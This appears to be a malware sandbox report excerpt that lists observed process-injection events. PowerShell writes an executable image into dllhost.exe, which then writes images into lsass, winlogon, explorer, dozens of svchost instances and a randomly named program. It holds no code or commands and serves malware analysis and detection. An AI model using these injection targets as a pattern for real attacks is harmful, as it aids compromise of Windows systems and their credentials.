        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC60380000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 161C7340000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 233B91B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 210918F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2062E960000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282B8D70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22856DC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207BAC00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27A01800000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2992B230000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23227590000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28098F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23ACD780000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1C1330000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192A4090000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5112C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2848B1D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A12F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8115C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C8B4690000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 213C6680000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: B80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25B905C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2905A8E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A5FA180000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19296180000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24ED0B70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20955300000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B054660000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15D00D80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20983090000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 278CACC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DAE2270000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 284FF340000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22687920000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B661F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD637D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 29E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2081CC80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23263180000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2064B670000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F535400000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 149A8F80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A0126F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 251F17A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1450000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: B00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 720000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 740000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1350000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 840000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 960000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 500000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E30000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1460000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 750000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 6C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1130000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: A10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1250000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 620000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C40000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E40000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1150000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1050000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1420000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E00000 value starts with: 4D5A
